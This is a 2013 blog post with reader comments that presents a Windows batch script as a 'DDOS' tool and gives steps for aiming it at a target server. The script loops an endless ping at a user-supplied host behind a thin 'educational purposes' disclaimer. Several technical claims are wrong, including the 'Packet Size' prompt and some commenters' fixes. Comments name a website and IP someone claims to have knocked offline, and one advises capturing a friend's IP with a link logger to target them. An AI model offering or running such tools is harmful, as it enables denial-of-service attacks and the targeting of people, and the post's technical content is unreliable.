Wednesday, 27 November 2013

How to create a DDOS using notepad

This is for educational purposes , whatever you do with this program is your own business I am not intending that you should use this against people because this can have consequences.
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 
Step 1: Create a text document with notepad.
Step 2: Copy and paste this script into that new text document.
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
@echo off
mode 67,16
title DDOS Attack (Created by ANONOMOUS MJ)
color 0a
cls
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo ANONOMOUS MJ'S DDOS
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
set /p x=Server-Target:
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ping %x%
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=IP Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- 
Step 3: Save the file as DDOS.bat
You have now Created the File
 
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
How to use the DDOS
 
When it says Server-Target type the web address of the server that you would like to DDOS
Then you should realise that it will come up Pinging (your web address here)
Now you should notice that the server of the person you would like to DDOS has appeared
Next it should come up IP Host : here is where you type the servers IP
Now it should pop up Packets : here you have to type 5000,000
Now it should keep repeating Attacking server in red now you have successfully DDOS the server
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
This is for educational purposes , whatever you do with this program is your own business I am not intending that you should use this against people because this can have very serious consequences.

22 comments:

  1. It doesn't work. I type in the server target but it comes up with this: 'ping.exe' is not recognized as an internal or external command, operable program or batch file.
    What Do?

    ReplyDelete
  2. You should save it as ping.bat. That runs it as a Windows batch file and not an executable file that you are saving it as.

    ReplyDelete
  3. This doesnt work this is fake :v

    ReplyDelete
  4. this is not fake I shut down a server for 45 min.

    the Ip for the: 192.186.252.39
    the name fot the website: www.winfix.co

    ReplyDelete
    Replies
    1. Did you actually shut it down, or did the server shut you out. Sometimes if too much data is being sent to a server, the server will shut out the ip adress that is ddosing the server.

      Delete
    2. This does not work... You would need like 10 of these to shutdown the weakest server no offense... Nice try...

      Delete
  5. what if I'm messing around with a friend? I don't know the server target

    ReplyDelete
    Replies
    1. there are websites(grabify.com) where you can send a link to a friend via email and get their ip adress when they click on it. there are numerous tutorials and videos on youtube on how to do this.

      Delete
  6. So this is why my website got shut down for 5 hours.

    ReplyDelete
  7. how do you know it has worked on the target server

    ReplyDelete
    Replies
    1. open up the website and see if its laggy or has crashed

      Delete
  8. are u sure this is legit and can they trace u

    ReplyDelete
  9. how long does it take to take the website down

    ReplyDelete
  10. doesn't work, all it does is pinging which is used to check if the host is alive. If it says Client Down, it means or your wifi is down, or the website got **DDOSED BY SOMEONE ELSE** or that they shut you out.

    Long story short, you can be traced, and its useless.

    ReplyDelete